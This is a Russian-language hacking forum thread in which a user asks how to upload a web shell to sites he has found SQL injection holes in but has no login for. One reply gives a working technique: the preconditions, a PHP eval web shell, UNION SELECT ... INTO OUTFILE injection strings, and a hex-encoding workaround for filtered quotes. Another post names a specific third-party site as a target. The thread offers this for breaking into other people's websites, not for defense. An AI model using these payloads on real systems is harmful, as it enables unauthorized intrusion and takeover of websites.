SQL бд без админки
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
SQL бд без админки - 2012-03-21 15:54:25.070000
|
|
|
Loters
Сообщений: 159
Оценки: 0
Присоединился: 2011-06-14 23:20:18.576666
|
Здравствуйте, есть несколько сайтов с уязвимостями, но нет логина на сайте (в том числе и админского). Выбрасывать их жалко. Можно как-то шелл туда загнать?
|
|
|
|
|
RE: SQL бд без админки - 2012-03-21 20:30:04.310000
|
|
|
Heitz
Сообщений: 84
Оценки: 0
Присоединился: 2012-02-27 23:54:14.600000
|
попробуй все таки найти админки, они не всегда открыты для глаз!
|
|
|
|
|
RE: SQL бд без админки - 2012-03-21 20:52:01.230000
|
|
|
Loters
Сообщений: 159
Оценки: 0
Присоединился: 2011-06-14 23:20:18.576666
|
Я смотрел, там только новости
|
|
|
|
|
RE: SQL бд без админки - 2012-03-21 21:07:11.080000
|
|
|
Mikro
Сообщений: 36
Оценки: 0
Присоединился: 2011-06-03 22:40:25.670000
|
quote:
Здравствуйте, есть несколько сайтов с уязвимостями, но нет логина на сайте Ты хоть расскажи вкратце,что за уязвимости,какого они типа,а то тут так сложно,что либо сказать по этому поводу…
|
|
|
|
|
RE: SQL бд без админки - 2012-03-21 21:49:50.160000
|
|
|
Zo_Omer
Сообщений: 81
Оценки: 0
Присоединился: 2012-02-15 20:15:15.383333
|
Проверь хостинг, есть на хостинге сайта есть бесплатный тариф или тестовый период, регистрируйся и смотри сервер бд. Потом подключайся через 3306 порт. И все!
|
|
|
|
|
RE: SQL бд без админки - 2012-03-21 21:53:23.060000
|
|
|
Loters
Сообщений: 159
Оценки: 0
Присоединился: 2011-06-14 23:20:18.576666
|
Какого типа может быть скуль?
Вот пример http://www.bcspeakers.net/product.php?id=1
|
|
|
|
|
RE: SQL бд без админки - 2012-03-21 21:56:35.500000
|
|
|
Loters
Сообщений: 159
Оценки: 0
Присоединился: 2011-06-14 23:20:18.576666
|
Zo_Omer, почему мне кажется, что это бред? И при чем тут дедики? Удаленно можно открыть на компе порт?
|
|
|
|
|
RE: SQL бд без админки - 2012-03-22 12:15:21.753333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
ORIGINAL: Loters
Здравствуйте, есть несколько сайтов с уязвимостями, но нет логина на сайте (в том числе и админского). Выбрасывать их жалко. Можно как-то шелл туда загнать?
Если сайт без админки, но есть скуль, пробуй через неё и залить.
При условии, что:
magic_quotes_gpc = Off
file_priv = Y
полный путь
папка, с возможностью записи.
в столбец шелл (например: '<?php eval($_REQUEST[cmd]);?>')
Ну и +from+mysql.user+into+outfile+'полный/путь/shell.php'–+1
Если кавычки фильтруются, то всё уже сложнее.
Но как вариант, если данные из первого запроса попадают во второй запрос.
В зависимости от того, сколько колонок во втором запросе составляем обычный запрос для заливки шелла. (тот же, что и выше)
Хексим и вставляем в принтабельный столбец первого запроса.
К примеру:
Запрос:
+union+select+1,2,3,4,5–+
Принт столбец 3-ий.
Во втором запросе, к примеру, 4 столбца.
Составляем запрос:
-1+union+select+1,2,'<?php eval($_REQUEST[cmd]);?>',4+from+mysql.user+into+outfile+'полный/путь/shell.php'–+
Хексим и вставляем в первый.
Т.е.:
+union+select+1,2,ЗАПРОС В HEX,4,5–+
quote:
Какого типа может быть скуль?
Вот пример http://www.bcspeakers.net/product.php?id=1
Обычная инъекция, в чем вопрос?
|
|
|
|
|
RE: SQL бд без админки - 2012-03-22 14:36:38.050000
|
|
|
Loters
Сообщений: 159
Оценки: 0
Присоединился: 2011-06-14 23:20:18.576666
|
r1dex, это был встречный вопрос к Mikro.
Ну и ответь же мне в аське! Я уже неделю пытаюсь достучаться, но в ответ игнор
|
|
|
|
|
RE: SQL бд без админки - 2012-03-28 06:56:20.336666
|
|
|
Sidius
Сообщений: 1
Оценки: 0
Присоединился: 2012-03-28 06:52:26.210000
|
Это не мои сайты случайно? Админку я еще не написал ) И не надо тыкать куда попало, я все вижу )
|
|
|
|
|
|
